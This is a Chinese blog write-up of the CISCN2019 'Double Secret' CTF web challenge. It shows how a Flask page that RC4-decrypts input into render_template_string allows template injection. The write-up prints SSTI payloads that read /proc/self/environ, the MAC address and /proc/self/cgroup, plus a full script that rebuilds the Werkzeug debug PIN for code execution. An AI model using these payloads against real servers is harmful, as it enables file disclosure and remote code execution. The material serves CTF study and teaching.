【BUUCTF】[CISCN2019 华东南赛区]Double Secret

最新推荐文章于 2023-02-07 16:02:44 发布

aoao今晚吃什么

最新推荐文章于 2023-02-07 16:02:44 发布

阅读量1.8k

点赞数

分类专栏： Flask 模板注入文章标签： web安全

本文链接：https://blog.csdn.net/aoao331198/article/details/124284420

版权

模板注入同时被 2 个专栏收录

4 篇文章 0 订阅

订阅专栏

Flask

3 篇文章 1 订阅

订阅专栏

本文探讨了一篇关于在Flask应用开启debug模式时出现的错误页面，指出此页面可用于执行Python代码。文章详细分析了RC4加密的使用，并展示了如何利用模板注入（SSTI）进行进一步的攻击。通过读取系统信息获取PIN码，作者给出了完整的exploit脚本，包括读取用户名、MAC地址和machine-id等敏感信息。同时，文章也提醒了关于PIN的安全问题及其在不同环境下的表现。

摘要由CSDN通过智能技术生成

在这里插入图片描述
尝试/secret

?secret=1

输入长一点

发现出现了报错，这个页面是flask应用开启了debug模式后运行出错的表现，在较老版本的flask中可以直接在这个页面中打开python控制台运行代码，而在较新版本的flask中要打开python控制台需要输入一个pin码
仔细观察报错，不难发现一处引人注目，单独拎出来审计代码

 if(secret==None):
        return 'Tell me your secret.I will encrypt it so others can\'t see'
    rc=rc4_Modified.RC4("HereIsTreasure")   #解密
    deS=rc.do_crypt(secret)
 
    a=render_template_string(safe(deS))
 
    if 'ciscn' in a.lower():
        return 'flag detected!'
    return a

可以肯定的是这里对secret使用了RC4加密，密钥为HereIsTreasure。还使用了模板渲染，可能存在ssti
RC4是一种对称加密算法，那么对密文进行再次加密就可以得到原来的明文，为了验证可以secret=d,看看结果如是否是对1 在这里插入图片描述
接下来利用render_template_string()，我们构造明文{{config}}对应的密文，该密文再次加密即为{{config}}

到这里接下来就是进行pin的获取，关于这一点，我进行了一次本地实验Flask Debug模式下的pin安全问题
这个题目环境略有不同，因为是Linux的pyhton2.7环境，但是思路是一致的。这里直接写wp

1.读username

 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/proc/self/environ').read()}}

2.读mac地址

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/sys/class/net/eth0/address').read()}}

3.读machine-id（这里比较特殊，我自己Linux的Python2.7测试不是这样的，可能和flask版本或者题目开docker容器的缘故）

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/proc/self/cgroup').read()}}

其他的数据

1 modname：‘flask.app’,
2.getattr(app, ‘name’, getattr(app.class, ‘name’))：“Flask”
3.getattr(mod, ‘file’, None)： ‘/usr/local/lib/python2.7/site-packages/flask/app.pyc’

最终脚本

import hashlib
from itertools import chain
probably_public_bits = [
    'glzjin'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/site-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]

private_bits = [
    '55680803709678',# str(uuid.getnode())
    '5568c325b4a26f17b2ccd62e599b62dec881f70c76d4ddb3f68c24a98398d26d'# get_machine_id()
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)